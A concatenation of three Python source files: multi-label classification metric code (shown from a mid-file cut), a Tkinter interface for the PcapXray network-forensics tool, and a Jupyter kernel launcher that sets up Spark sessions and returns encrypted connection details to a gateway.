fp = numpy.sum(numpy.logical_not(true_targets) * predictions,
axis=axis).astype('float32')
fn = numpy.sum(true_targets * numpy.logical_not(predictions),
axis=axis).astype('float32')
return (tp, fp, fn)
def example_f1_score(true_targets, predictions, per_sample=False, axis=0):
tp, fp, fn = compute_tp_fp_fn(true_targets, predictions, axis=axis)
numerator = 2*tp
denominator = (numpy.sum(true_targets,axis=axis).astype('float32') + numpy.sum(predictions,axis=axis).astype('float32'))
zeros = numpy.where(denominator == 0)[0]
denominator = numpy.delete(denominator,zeros)
numerator = numpy.delete(numerator,zeros)
example_f1 = numerator/denominator
if per_sample:
f1 = example_f1
else:
f1 = numpy.mean(example_f1)
return f1
def f1_score_from_stats(tp, fp, fn, average='micro'):
assert len(tp) == len(fp)
assert len(fp) == len(fn)
if average not in set(['micro', 'macro']):
raise ValueError("Specify micro or macro")
if average == 'micro':
f1 = 2*numpy.sum(tp) / \
float(2*numpy.sum(tp) + numpy.sum(fp) + numpy.sum(fn))
elif average == 'macro':
def safe_div(a, b):
""" ignore / 0, div0( [-1, 0, 1], 0 ) -> [0, 0, 0] """
with numpy.errstate(divide='ignore', invalid='ignore'):
c = numpy.true_divide(a, b)
return c[numpy.isfinite(c)]
f1 = numpy.mean(safe_div(2*tp, 2*tp + fp + fn))
return f1
def f1_score(true_targets, predictions, average='micro', axis=0):
"""
average: str
'micro' or 'macro'
axis: 0 or 1
label axis
"""
if average not in set(['micro', 'macro']):
raise ValueError("Specify micro or macro")
tp, fp, fn = compute_tp_fp_fn(true_targets, predictions, axis=axis)
f1 = f1_score_from_stats(tp, fp, fn, average=average)
return f1
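# Worked example (illustrative): with per-label counts taken along axis=0 and
# the inputs given as numpy arrays,
#   true_targets = [[1, 0], [0, 1]]
#   predictions  = [[1, 0], [1, 1]]
# give tp=[1, 1], fp=[1, 0], fn=[0, 0], so
#   f1_score(true_targets, predictions, average='micro') == 2*2 / (2*2 + 1 + 0) == 0.8
#   f1_score(true_targets, predictions, average='macro') == mean(2/3, 1.0) ~= 0.83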
def compute_aupr_thread(all_targets,all_predictions):
aupr_array = []
lock = Lock()
def compute_aupr_(start,end,all_targets,all_predictions):
for i in range(start, end):
try:
precision, recall, thresholds = metrics.precision_recall_curve(all_targets[:,i], all_predictions[:,i], pos_label=1)
auPR = metrics.auc(recall,precision,reorder=True)
lock.acquire()
aupr_array.append(numpy.nan_to_num(auPR))
lock.release()
except Exception:
pass
t1 = Thread(target=compute_aupr_, args=(0,100,all_targets,all_predictions) )
t2 = Thread(target=compute_aupr_, args=(100,200,all_targets,all_predictions) )
t3 = Thread(target=compute_aupr_, args=(200,300,all_targets,all_predictions) )
t4 = Thread(target=compute_aupr_, args=(300,400,all_targets,all_predictions) )
t5 = Thread(target=compute_aupr_, args=(400,500,all_targets,all_predictions) )
t6 = Thread(target=compute_aupr_, args=(500,600,all_targets,all_predictions) )
t7 = Thread(target=compute_aupr_, args=(600,700,all_targets,all_predictions) )
t8 = Thread(target=compute_aupr_, args=(700,800,all_targets,all_predictions) )
t9 = Thread(target=compute_aupr_, args=(800,900,all_targets,all_predictions) )
t10 = Thread(target=compute_aupr_, args=(900,919,all_targets,all_predictions) )
t1.start();t2.start();t3.start();t4.start();t5.start();t6.start();t7.start();t8.start();t9.start();t10.start()
t1.join();t2.join();t3.join();t4.join();t5.join();t6.join();t7.join();t8.join();t9.join();t10.join()
aupr_array = numpy.array(aupr_array)
mean_aupr = numpy.mean(aupr_array)
median_aupr = numpy.median(aupr_array)
return mean_aupr,median_aupr,aupr_array
def compute_fdr(all_targets,all_predictions, fdr_cutoff=0.5):
fdr_array = []
for i in range(all_targets.shape[1]):
try:
precision, recall, thresholds = metrics.precision_recall_curve(all_targets[:,i], all_predictions[:,i],pos_label=1)
fdr = 1- precision
cutoff_index = next(i for i, x in enumerate(fdr) if x <= fdr_cutoff)
fdr_at_cutoff = recall[cutoff_index]
if not math.isnan(fdr_at_cutoff):
fdr_array.append(numpy.nan_to_num(fdr_at_cutoff))
except:
pass
fdr_array = numpy.array(fdr_array)
mean_fdr = numpy.mean(fdr_array)
median_fdr = numpy.median(fdr_array)
var_fdr = numpy.var(fdr_array)
return mean_fdr,median_fdr,var_fdr,fdr_array
def compute_aupr(all_targets,all_predictions):
aupr_array = []
for i in range(all_targets.shape[1]):
try:
precision, recall, thresholds = metrics.precision_recall_curve(all_targets[:,i], all_predictions[:,i], pos_label=1)
auPR = metrics.auc(recall,precision,reorder=True)
if not math.isnan(auPR):
aupr_array.append(numpy.nan_to_num(auPR))
except:
pass
aupr_array = numpy.array(aupr_array)
mean_aupr = numpy.mean(aupr_array)
median_aupr = numpy.median(aupr_array)
var_aupr = numpy.var(aupr_array)
return mean_aupr,median_aupr,var_aupr,aupr_array
def compute_auc_thread(all_targets,all_predictions):
auc_array = []
lock = Lock()
def compute_auc_(start,end,all_targets,all_predictions):
for i in range(start,end):
try:
auROC = metrics.roc_auc_score(all_targets[:,i], all_predictions[:,i])
lock.acquire()
if not math.isnan(auROC):
auc_array.append(auROC)
lock.release()
except ValueError:
pass
t1 = Thread(target=compute_auc_, args=(0,100,all_targets,all_predictions) )
t2 = Thread(target=compute_auc_, args=(100,200,all_targets,all_predictions) )
t3 = Thread(target=compute_auc_, args=(200,300,all_targets,all_predictions) )
t4 = Thread(target=compute_auc_, args=(300,400,all_targets,all_predictions) )
t5 = Thread(target=compute_auc_, args=(400,500,all_targets,all_predictions) )
t6 = Thread(target=compute_auc_, args=(500,600,all_targets,all_predictions) )
t7 = Thread(target=compute_auc_, args=(600,700,all_targets,all_predictions) )
t8 = Thread(target=compute_auc_, args=(700,800,all_targets,all_predictions) )
t9 = Thread(target=compute_auc_, args=(800,900,all_targets,all_predictions) )
t10 = Thread(target=compute_auc_, args=(900,919,all_targets,all_predictions) )
t1.start();t2.start();t3.start();t4.start();t5.start();t6.start();t7.start();t8.start();t9.start();t10.start()
t1.join();t2.join();t3.join();t4.join();t5.join();t6.join();t7.join();t8.join();t9.join();t10.join()
auc_array = numpy.array(auc_array)
mean_auc = numpy.mean(auc_array)
median_auc = numpy.median(auc_array)
return mean_auc,median_auc,auc_array
def compute_auc(all_targets,all_predictions):
auc_array = []
lock = Lock()
for i in range(all_targets.shape[1]):
try:
auROC = metrics.roc_auc_score(all_targets[:,i], all_predictions[:,i])
auc_array.append(auROC)
except ValueError:
pass
auc_array = numpy.array(auc_array)
mean_auc = numpy.mean(auc_array)
median_auc = numpy.median(auc_array)
var_auc = numpy.var(auc_array)
return mean_auc,median_auc,var_auc,auc_array
def Find_Optimal_Cutoff(all_targets, all_predictions):
thresh_array = []
for j in range(all_targets.shape[1]):
try:
fpr, tpr, threshold = roc_curve(all_targets[:,j], all_predictions[:,j], pos_label=1)
i = numpy.arange(len(tpr))
roc = pd.DataFrame({'tf' : pd.Series(tpr-(1-fpr), index=i), 'threshold' : pd.Series(threshold, index=i)})
roc_t = roc.iloc[(roc.tf-0).abs().argsort()[:1]]
thresh_array.append(list(roc_t['threshold'])[0])
except:
pass
return thresh_array
def compute_metrics(all_predictions,all_targets,loss,args,elapsed,all_metrics=True,verbose=True):
all_targets = all_targets.numpy()
all_predictions = all_predictions.numpy()
if all_metrics:
meanAUC,medianAUC,varAUC,allAUC = compute_auc(all_targets,all_predictions)
meanAUPR,medianAUPR,varAUPR,allAUPR = compute_aupr(all_targets,all_predictions)
meanFDR,medianFDR,varFDR,allFDR = compute_fdr(all_targets,all_predictions)
else:
meanAUC,medianAUC,varAUC,allAUC = 0,0,0,0
meanAUPR,medianAUPR,varAUPR,allAUPR = 0,0,0,0
meanFDR,medianFDR,varFDR,allFDR = 0,0,0,0
optimal_threshold = args.br_threshold
# optimal_thresholds = Find_Optimal_Cutoff(all_targets,all_predictions)
# optimal_threshold = numpy.mean(numpy.array(optimal_thresholds))
if args.decoder in ['mlp','rnn_b','graph']:
all_predictions[all_predictions < optimal_threshold] = 0
all_predictions[all_predictions >= optimal_threshold] = 1
else:
all_predictions[all_predictions > 0.0] = 1
acc_ = list(subset_accuracy(all_targets, all_predictions, axis=1, per_sample=True))
hl_ = list(hamming_loss(all_targets, all_predictions, axis=1, per_sample=True))
exf1_ = list(example_f1_score(all_targets, all_predictions, axis=1, per_sample=True))
acc = numpy.mean(acc_)
hl = numpy.mean(hl_)
exf1 = numpy.mean(exf1_)
tp, fp, fn = compute_tp_fp_fn(all_targets, all_predictions, axis=0)
mif1 = f1_score_from_stats(tp, fp, fn, average='micro')
maf1 = f1_score_from_stats(tp, fp, fn, average='macro')
eval_ret = OrderedDict([('Subset accuracy', acc),
('Hamming accuracy', 1 - hl),
('Example-based F1', exf1),
('Label-based Micro F1', mif1),
('Label-based Macro F1', maf1)])
ACC = eval_ret['Subset accuracy']
HA = eval_ret['Hamming accuracy']
ebF1 = eval_ret['Example-based F1']
miF1 = eval_ret['Label-based Micro F1']
maF1 = eval_ret['Label-based Macro F1']
if verbose:
print('ACC: '+str(ACC))
print('HA: '+str(HA))
print('ebF1: '+str(ebF1))
print('miF1: '+str(miF1))
print('maF1: '+str(maF1))
if verbose:
print('uAUC: '+str(meanAUC))
# print('mAUC: '+str(medianAUC))
print('uAUPR: '+str(meanAUPR))
# print('mAUPR: '+str(medianAUPR))
print('uFDR: '+str(meanFDR))
# print('mFDR: '+str(medianFDR))
metrics_dict = {}
metrics_dict['ACC'] = ACC
metrics_dict['HA'] = HA
metrics_dict['ebF1'] = ebF1
metrics_dict['miF1'] = miF1
metrics_dict['maF1'] = maF1
metrics_dict['meanAUC'] = meanAUC
metrics_dict['medianAUC'] = medianAUC
metrics_dict['meanAUPR'] = meanAUPR
metrics_dict['allAUC'] = allAUC
metrics_dict['medianAUPR'] = medianAUPR
metrics_dict['allAUPR'] = allAUPR
metrics_dict['meanFDR'] = meanFDR
metrics_dict['medianFDR'] = medianFDR
metrics_dict['loss'] = loss
metrics_dict['time'] = elapsed
return metrics_dict
class Logger:
def __init__(self,args):
self.model_name = args.model_name
if args.model_name:
try:
os.makedirs(args.model_name)
except OSError as exc:
pass
try:
os.makedirs(args.model_name+'/epochs/')
except OSError as exc:
pass
self.file_names = {}
self.file_names['train'] = os.path.join(args.model_name,'train_results.csv')
self.file_names['valid'] = os.path.join(args.model_name,'valid_results.csv')
self.file_names['test'] = os.path.join(args.model_name,'test_results.csv')
self.file_names['valid_all_aupr'] = os.path.join(args.model_name,'valid_all_aupr.csv')
self.file_names['valid_all_auc'] = os.path.join(args.model_name,'valid_all_auc.csv')
self.file_names['test_all_aupr'] = os.path.join(args.model_name,'test_all_aupr.csv')
self.file_names['test_all_auc'] = os.path.join(args.model_name,'test_all_auc.csv')
f = open(self.file_names['train'],'w+'); f.close()
f = open(self.file_names['valid'],'w+'); f.close()
f = open(self.file_names['test'],'w+'); f.close()
f = open(self.file_names['valid_all_aupr'],'w+'); f.close()
f = open(self.file_names['valid_all_auc'],'w+'); f.close()
f = open(self.file_names['test_all_aupr'],'w+'); f.close()
f = open(self.file_names['test_all_auc'],'w+'); f.close()
os.utime(args.model_name,None)
self.best_valid = {'loss':1000000,'ACC':0,'HA':0,'ebF1':0,'miF1':0,'maF1':0,'meanAUC':0,'medianAUC':0,'meanAUPR':0,'medianAUPR':0,'meanFDR':0,'medianFDR':0,'allAUC':None,'allAUPR':None}
self.best_test = {'loss':1000000,'ACC':0,'HA':0,'ebF1':0,'miF1':0,'maF1':0,'meanAUC':0,'medianAUC':0,'meanAUPR':0,'medianAUPR':0,'meanFDR':0,'medianFDR':0,'allAUC':None,'allAUPR':None,'epoch':0}
def evaluate(self,train_metrics,valid_metrics,test_metrics,epoch,num_params):
if self.model_name:
# if train_metrics is not None:
# with open(self.file_names['train'],'a') as f:
# f.write(str(epoch)+','+str(train_metrics['loss'])
# +','+str(train_metrics['ACC'])
# +','+str(train_metrics['HA'])
# +','+str(train_metrics['ebF1'])
# +','+str(train_metrics['miF1'])
# +','+str(train_metrics['maF1'])
# +','+str(train_metrics['meanAUC'])
# +','+str(train_metrics['medianAUC'])
# +','+str(train_metrics['meanAUPR'])
# +','+str(train_metrics['medianAUPR'])
# +','+str(train_metrics['meanFDR'])
# +','+str(train_metrics['medianFDR'])
# +','+'{elapse:3.3f}'.format(elapse=train_metrics['time'])
# +','+str(num_params)
# +'\n')
# with open(self.file_names['valid'],'a') as f:
# f.write(str(epoch)+','+str(valid_metrics['loss'])
# +','+str(valid_metrics['ACC'])
# +','+str(valid_metrics['HA'])
# +','+str(valid_metrics['ebF1'])
# +','+str(valid_metrics['miF1'])
# +','+str(valid_metrics['maF1'])
# +','+str(valid_metrics['meanAUC'])
# +','+str(valid_metrics['medianAUC'])
# +','+str(valid_metrics['meanAUPR'])
# +','+str(valid_metrics['medianAUPR'])
# +','+str(valid_metrics['meanFDR'])
# +','+str(valid_metrics['medianFDR'])
# +','+'{elapse:3.3f}'.format(elapse=train_metrics['time'])
# +','+'{elapse:3.3f}'.format(elapse=valid_metrics['time'])
# +','+str(num_params)
# +'\n')
# with open(self.file_names['test'],'a') as f:
# f.write(str(epoch)+','+str(test_metrics['loss'])
# +','+str(test_metrics['ACC'])
# +','+str(test_metrics['HA'])
# +','+str(test_metrics['ebF1'])
# +','+str(test_metrics['miF1'])
# +','+str(test_metrics['maF1'])
# +','+str(test_metrics['meanAUC'])
# +','+str(test_metrics['medianAUC'])
# +','+str(test_metrics['meanAUPR'])
# +','+str(test_metrics['medianAUPR'])
# +','+str(test_metrics['meanFDR'])
# +','+str(test_metrics['medianFDR'])
# +','+'{elapse:3.3f}'.format(elapse=train_metrics['time'])
# +','+'{elapse:3.3f}'.format(elapse=test_metrics['time'])
# +','+str(num_params)
# +'\n')
with open(self.file_names['valid_all_auc'],'a') as f:
f.write(str(epoch))
for i,val in enumerate(valid_metrics['allAUC']):
f.write(','+str(val))
f.write('\n')
f.close()
with open(self.file_names['valid_all_aupr'],'a') as f:
f.write(str(epoch))
for i,val in enumerate(valid_metrics['allAUPR']):
f.write(','+str(val))
f.write('\n')
f.close()
with open(self.file_names['test_all_auc'],'a') as f:
f.write(str(epoch))
for i,val in enumerate(test_metrics['allAUC']):
f.write(','+str(val))
f.write('\n')
f.close()
with open(self.file_names['test_all_aupr'],'a') as f:
f.write(str(epoch))
for i,val in enumerate(test_metrics['allAUPR']):
f.write(','+str(val))
f.write('\n')
f.close()
for metric in valid_metrics.keys():
if 'all' not in metric and 'time' not in metric:
if valid_metrics[metric] >= self.best_valid[metric]:
self.best_valid[metric]= valid_metrics[metric]
self.best_test[metric]= test_metrics[metric]
if metric == 'ACC':
self.best_test['epoch'] = epoch
print('\n')
print('**********************************')
print('best ACC: '+str(self.best_test['ACC']))
print('best HA: '+str(self.best_test['HA']))
print('best ebF1: '+str(self.best_test['ebF1']))
print('best miF1: '+str(self.best_test['miF1']))
print('best maF1: '+str(self.best_test['maF1']))
print('best meanAUC: '+str(self.best_test['meanAUC']))
print('best meanAUPR: '+str(self.best_test['meanAUPR']))
print('best meanFDR: '+str(self.best_test['meanFDR']))
print('**********************************')
return self.best_valid,self.best_test
|
userInterface.py
|
from __future__ import print_function
from Tkinter import *
import Tkinter, Tkconstants, tkFileDialog
import ttk
import tkMessageBox
import pcapReader
import plotLanNetwork
import communicationDetailsFetch
import reportGen
import time
import threading
import Queue
from PIL import Image,ImageTk
import os, sys
class pcapXrayGui:
def __init__(self, base):
# Base Frame Configuration
self.base = base
base.title("PcapXray")
Label(base, text="PcapXray Tool - A LAN Network Analyzer")
# Style Configuration
style = ttk.Style()
style.configure("BW.TLabel", foreground="black")
style.configure("BW.TEntry", foreground="black")
# 1st Frame - Initial Frame
InitFrame = ttk.Frame(base, width=50, padding="10 10 10 10",relief= GROOVE)
InitFrame.grid(column=10, row=10, sticky=(N, W, E, S))
InitFrame.columnconfigure(10, weight=1)
InitFrame.rowconfigure(10, weight=1)
# Pcap File Entry
self.pcap_file = StringVar()
self.filename = ""
ttk.Label(InitFrame, text="Enter pcap file path: ",style="BW.TLabel").grid(column=0, row=0, sticky="W")
self.filename_field = ttk.Entry(InitFrame, width=30, textvariable=self.pcap_file, style="BW.TEntry")
self.filename_field.grid(column=1, row=0, sticky="W, E")
self.progressbar = ttk.Progressbar(InitFrame, orient="horizontal", length=200,value=0, maximum=200, mode="indeterminate")
# Browse button
#self.filename = StringVar()
ttk.Button(InitFrame, text="Browse", command=self.browse_directory).grid(column=2, row=0, padx=10, pady=10,sticky="E")
ttk.Button(InitFrame, text="Analyze!", command=self.pcap_analyse).grid(column=3, row=0, padx=10, pady=10,sticky="E")
self.progressbar.grid(column=4, row=0, padx=10, pady=10, sticky="E")
# Second Frame with Options
SecondFrame = ttk.Frame(base, width=50, padding="10 10 10 10",relief= GROOVE)
SecondFrame.grid(column=10, row=20, sticky=(N, W, E, S))
SecondFrame.columnconfigure(10, weight=1)
SecondFrame.rowconfigure(10, weight=1)
ttk.Label(SecondFrame, text="Options: ", style="BW.TLabel").grid(row=10,column=0,sticky="W")
self.option = StringVar()
self.options = {'All','HTTP','HTTPS','Tor','Malicious'}
#self.option.set('Tor')
ttk.OptionMenu(SecondFrame,self.option,"Select",*self.options).grid(row=10,column=1,sticky="W")
self.zoom = [900,900]
self.img = ""
ttk.Button(SecondFrame, text="zoomIn", command=self.zoom_in).grid(row=10,column=10,padx=5,sticky="E")
ttk.Button(SecondFrame, text="zoomOut", command=self.zoom_out).grid(row=10,column=11,sticky="E")
# Third Frame with Results and Descriptions
self.ThirdFrame = ttk.Frame(base, width=100, height=100, padding="10 10 10 10",relief= GROOVE)
description = """It is a tool aimed to simplyfy the network analysis and speed the process of analysing the network traffic.\nThis prototype aims to accomplish 4 important modules,
\n 1. Web Traffic\n 2. Tor Traffic \n 3. Malicious Traffic \n 4. Device/Traffic Details\n\nPlease contact me @ [email protected] for any bugs or problems !
"""
self.label = ttk.Label(self.ThirdFrame, text="Description: \nThe PcapXray tool is an aid for Network Forensics or any Network Analysis!\n"+description, style="BW.TLabel")
self.label.grid(column=10, row=10,sticky="W")
self.xscrollbar = Scrollbar(self.ThirdFrame, orient=HORIZONTAL)
self.xscrollbar.grid(row=100, column=0, sticky=E + W)
self.yscrollbar = Scrollbar(self.ThirdFrame, orient=VERTICAL)
self.yscrollbar.grid(row=0, column=100, sticky=N + S)
self.ThirdFrame.grid(column=10, row=30, sticky=(N, W, E, S))
self.ThirdFrame.columnconfigure(0, weight=1)
self.ThirdFrame.rowconfigure(0, weight=1)
self.name_servers = ""
def browse_directory(self):
# Reference: http://effbot.org/tkinterbook/tkinter-dialog-windows.htm
self.pcap_file.set(tkFileDialog.askopenfilename(initialdir = sys.path[0],title = "Select Packet Capture File!",filetypes = (("pcap files","*.pcap"),("pcapng files","*.pcapng"))))
self.filename = self.pcap_file.get().replace(".pcap","")
if "/" in self.filename:
self.filename = self.filename.split("/")[-1]
#,("all files","*.*")
#self.filename_field.delete(0, END)
#self.filename_field.insert(0, self.pcap_file)
print(self.filename)
print(self.pcap_file)
def pcap_analyse(self):
if os.path.exists(self.pcap_file.get()):
self.progressbar.start()
result = Queue.Queue()
packet_read = threading.Thread(target=pcapReader.pcapReader,args=(self.pcap_file.get(),result))
packet_read.start()
while packet_read.is_alive():
self.progressbar.update()
packet_read.join()
self.progressbar.stop()
#packet_read.join()
self.capture_read = result.get()
reportThreadpcap = threading.Thread(target=reportGen.reportGen().packetDetails,args=(self.capture_read,))
reportThreadpcap.start()
#self.option.set("Tor")
self.option.trace("w",self.map_select)
#self.option.set("Tor")
self.name_servers = ""
else:
tkMessageBox.showerror("Error","File Not Found !")
def generate_graph(self):
if self.name_servers == "":
result = Queue.Queue()
t = threading.Thread(target=communicationDetailsFetch.trafficDetailsFetch,args=(self.capture_read,result))
t.start()
self.progressbar.start()
while t.is_alive():
self.progressbar.update()
t.join()
self.progressbar.stop()
self.name_servers = result.get()
reportThread = threading.Thread(target=reportGen.reportGen().communicationDetailsReport,args=(self.name_servers,))
reportThread.start()
if not os.path.exists("Report/"+self.filename+self.option.get()+".png"):
t1 = threading.Thread(target=plotLanNetwork.plotLan, args=(self.capture_read, self.filename, self.name_servers, self.option.get(),))
t1.start()
self.progressbar.start()
while t1.is_alive():
self.progressbar.update()
t1.join()
self.progressbar.stop()
self.label.grid_forget()
self.load_image()
else:
self.label.grid_forget()
self.load_image()
def load_image(self):
self.canvas = Canvas(self.ThirdFrame, width=700,height=600, bd=0, bg="navy", xscrollcommand=self.xscrollbar.set, yscrollcommand=self.yscrollbar.set)
self.canvas.grid(row=0, column=0, sticky=N + S + E + W)
self.img = ImageTk.PhotoImage(Image.open("Report/"+self.filename+self.option.get()+".png").resize(tuple(self.zoom),Image.ANTIALIAS).convert('RGB'))
self.canvas.create_image(0,0, image=self.img)
self.canvas.config(scrollregion=self.canvas.bbox(ALL))
self.xscrollbar.config(command=self.canvas.xview)
self.yscrollbar.config(command=self.canvas.yview)
def map_select(self, *args):
print(self.option.get())
self.generate_graph()
def zoom_in(self):
print("zoomin")
self.zoom[0] += 100
self.zoom[1] += 100
if self.img:
self.load_image()
def zoom_out(self):
print("zoomout")
if self.zoom[0] > 700 and self.zoom[1] > 700:
self.zoom[0] -= 100
self.zoom[1] -= 100
else:
print("zoomout --> maximum")
if self.img:
self.load_image()
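# The methods above keep Tk responsive by running each blocking step on a
# worker thread and pumping the indeterminate progressbar until it finishes.
# The same pattern in isolation (an illustrative sketch with hypothetical
# names, not code from this file):
#
#   result = Queue.Queue()
#   worker = threading.Thread(target=long_running_job, args=(result,))
#   worker.start()
#   progressbar.start()
#   while worker.is_alive():
#       progressbar.update()
#   worker.join()
#   progressbar.stop()
#   value = result.get()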
def main():
base = Tk()
pcapXrayGui(base)
base.mainloop()
#main()
|
launch_ipykernel.py
|
import argparse
import base64
import json
import logging
import os
import socket
import tempfile
import uuid
from future.utils import raise_from
from multiprocessing import Process
import random
from threading import Thread
from Cryptodome.Cipher import AES
from ipython_genutils.py3compat import str_to_bytes
from jupyter_client.connect import write_connection_file
# Minimum port range size and max retries
min_port_range_size = int(os.getenv('EG_MIN_PORT_RANGE_SIZE', '1000'))
max_port_range_retries = int(os.getenv('EG_MAX_PORT_RANGE_RETRIES', '5'))
log_level = int(os.getenv('EG_LOG_LEVEL', '10'))
logging.basicConfig(format='[%(levelname)1.1s %(asctime)s.%(msecs).03d %(name)s] %(message)s')
logger = logging.getLogger('launch_ipykernel')
logger.setLevel(log_level)
class ExceptionThread(Thread):
# Wrap thread to handle the exception
def __init__(self, target):
self.target = target
self.exc = None
Thread.__init__(self)
def run(self):
try:
self.target()
except Exception as exc:
self.exc = exc
def initialize_namespace(namespace, cluster_type='spark'):
"""Initialize the kernel namespace.
Parameters
----------
namespace : dict
The namespace (typically ``locals()``) into which the cluster variables are installed.
cluster_type : {'spark', 'dask', 'none'}
The cluster type to initialize. ``'none'`` results in no variables in
the initial namespace.
"""
if cluster_type == 'spark':
try:
from pyspark.sql import SparkSession
except ImportError:
logger.info("A spark context was desired but the pyspark distribution is not present. "
"Spark context creation will not occur.")
return {}
def initialize_spark_session():
"""Initialize Spark session and replace global variable
placeholders with real Spark session object references."""
import atexit
spark = SparkSession.builder.getOrCreate()
sc = spark.sparkContext
sql = spark.sql
sqlContext = spark._wrapped
sqlCtx = sqlContext
# Stop the spark session on exit
atexit.register(lambda: spark.stop())
namespace.update({'spark': spark,
'sc': spark.sparkContext,
'sql': spark.sql,
'sqlContext': spark._wrapped,
'sqlCtx': spark._wrapped})
init_thread = ExceptionThread(target=initialize_spark_session)
spark = WaitingForSparkSessionToBeInitialized('spark', init_thread, namespace)
sc = WaitingForSparkSessionToBeInitialized('sc', init_thread, namespace)
sqlContext = WaitingForSparkSessionToBeInitialized('sqlContext', init_thread, namespace)
def sql(query):
"""Placeholder function. When called will wait for Spark session to be
initialized and call ``spark.sql(query)``"""
return spark.sql(query)
namespace.update({'spark': spark,
'sc': sc,
'sql': sql,
'sqlContext': sqlContext,
'sqlCtx': sqlContext})
init_thread.start()
elif cluster_type == 'dask':
import dask_yarn
cluster = dask_yarn.YarnCluster.from_current()
namespace.update({'cluster': cluster})
elif cluster_type != 'none':
raise RuntimeError("Unknown cluster_type: %r" % cluster_type)
class WaitingForSparkSessionToBeInitialized(object):
"""Wrapper object for SparkContext and other Spark session variables while the real Spark session is being
initialized in a background thread. The class name is intentionally verbose and explicit, as it will show up
when executing a cell that contains only a Spark session variable like ``sc`` or ``sqlContext``.
"""
# private and public attributes that show up for tab completion,
# to indicate pending initialization of Spark session
_WAITING_FOR_SPARK_SESSION_TO_BE_INITIALIZED = 'Spark Session not yet initialized ...'
WAITING_FOR_SPARK_SESSION_TO_BE_INITIALIZED = 'Spark Session not yet initialized ...'
# the same wrapper class is used for all Spark session variables, so we need to record the name of the variable
def __init__(self, global_variable_name, init_thread, namespace):
self._spark_session_variable = global_variable_name
self._init_thread = init_thread
self._namespace = namespace
# we intercept all method and attribute references on our temporary Spark session variable,
# wait for the thread to complete initializing the Spark sessions and then we forward the
# call to the real Spark objects
def __getattr__(self, name):
# ignore tab-completion request for __members__ or __methods__ and ignore meta property requests
if name.startswith("__"):
pass
elif name.startswith("_ipython_"):
pass
elif name.startswith("_repr_"):
pass
else:
# wait on thread to initialize the Spark session variables in global variable scope
self._init_thread.join(timeout=None)
exc = self._init_thread.exc
if exc:
raise_from(RuntimeError("Variable: {} was not initialized properly.".format(self._spark_session_variable)), exc)
# now return attribute/function reference from actual Spark object
return getattr(self._namespace[self._spark_session_variable], name)
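# Illustrative effect (not executed here): before the background thread
# finishes, `sc` is a WaitingForSparkSessionToBeInitialized proxy; the first
# real attribute access, e.g. `sc.parallelize(range(4))`, blocks on
# init_thread.join() and is then forwarded to the real SparkContext stored in
# the namespace.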
def prepare_gateway_socket(lower_port, upper_port):
sock = _select_socket(lower_port, upper_port)
logger.info("Signal socket bound to host: {}, port: {}".format(sock.getsockname()[0], sock.getsockname()[1]))
sock.listen(1)
sock.settimeout(5)
return sock
def _encrypt(connection_info, conn_file):
# AES operates on 16-byte blocks; the 16-character key derived below yields AES-128.
BLOCK_SIZE = 16
# Ensure that the length of the data that will be encrypted is a
# multiple of BLOCK_SIZE by padding with '%' on the right.
PADDING = '%'
pad = lambda s: s.decode("utf-8") + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING
# Encrypt connection_info whose length is a multiple of BLOCK_SIZE using
# AES cipher and then encode the resulting byte array using Base64.
encryptAES = lambda c, s: base64.b64encode(c.encrypt(pad(s).encode('utf-8')))
# Create a key using first 16 chars of the kernel-id that is burnt in
# the name of the connection file.
bn = os.path.basename(conn_file)
if (bn.find("kernel-") == -1):
logger.error("Invalid connection file name '{}'".format(conn_file))
raise RuntimeError("Invalid connection file name '{}'".format(conn_file))
tokens = bn.split("kernel-")
kernel_id = tokens[1]
key = kernel_id[0:16]
# print("AES Encryption Key '{}'".format(key))
# Creates the cipher obj using the key.
cipher = AES.new(key.encode('utf-8'), AES.MODE_ECB)
payload = encryptAES(cipher, connection_info)
return payload
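# Illustrative counterpart (hypothetical helper, not part of this launcher):
# a receiver holding the same 16-character key could invert _encrypt by
# reversing the Base64/AES-ECB steps and stripping the '%' padding:
#
#   def _decrypt(payload, key):
#       cipher = AES.new(key.encode('utf-8'), AES.MODE_ECB)
#       decoded = cipher.decrypt(base64.b64decode(payload)).decode('utf-8')
#       return json.loads(decoded.rstrip('%'))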
def return_connection_info(connection_file, response_addr, lower_port, upper_port):
response_parts = response_addr.split(":")
if len(response_parts) != 2:
logger.error("Invalid format for response address '{}'. "
"Assuming 'pull' mode...".format(response_addr))
return
response_ip = response_parts[0]
try:
response_port = int(response_parts[1])
except ValueError:
logger.error("Invalid port component found in response address '{}'. "
"Assuming 'pull' mode...".format(response_addr))
return
with open(connection_file) as fp:
cf_json = json.load(fp)
fp.close()
# add process and process group ids into connection info
pid = os.getpid()
cf_json['pid'] = str(pid)
cf_json['pgid'] = str(os.getpgid(pid))
# prepare socket address for handling signals
gateway_sock = prepare_gateway_socket(lower_port, upper_port)
cf_json['comm_port'] = gateway_sock.getsockname()[1]
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((response_ip, response_port))
json_content = json.dumps(cf_json).encode(encoding='utf-8')
logger.debug("JSON Payload '{}".format(json_content))
payload = _encrypt(json_content, connection_file)
logger.debug("Encrypted Payload '{}".format(payload))
s.send(payload)
finally:
s.close()
return gateway_sock
def determine_connection_file(conn_file, kid):
# If the directory exists, use the original file, else create a temporary file.
if conn_file is None or not os.path.exists(os.path.dirname(conn_file)):
if kid is not None:
basename = 'kernel-' + kid
else:
basename = os.path.splitext(os.path.basename(conn_file))[0]
fd, conn_file = tempfile.mkstemp(suffix=".json", prefix=basename + "_")
os.close(fd)
logger.debug("Using connection file '{}'.".format(conn_file))
return conn_file
def _select_ports(count, lower_port, upper_port):
"""Select and return n random ports that are available and adhere to the given port range, if applicable."""
ports = []
sockets = []
for i in range(count):
sock = _select_socket(lower_port, upper_port)
ports.append(sock.getsockname()[1])
sockets.append(sock)
for sock in sockets:
sock.close()
return ports
def _select_socket(lower_port, upper_port):
"""Create and return a socket whose port is available and adheres to the given port range, if applicable."""
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
found_port = False
retries = 0
while not found_port:
try:
sock.bind(('0.0.0.0', _get_candidate_port(lower_port, upper_port)))
found_port = True
except Exception:
retries = retries + 1
if retries > max_port_range_retries:
raise RuntimeError(
"Failed to locate port within range {}..{} after {} retries!".
format(lower_port, upper_port, max_port_range_retries))
return sock
def _get_candidate_port(lower_port, upper_port):
range_size = upper_port - lower_port
if range_size == 0:
return 0
return random.randint(lower_port, upper_port)
def _validate_port_range(port_range):
# if no argument was provided, return a range of 0
if not port_range:
return 0, 0
try:
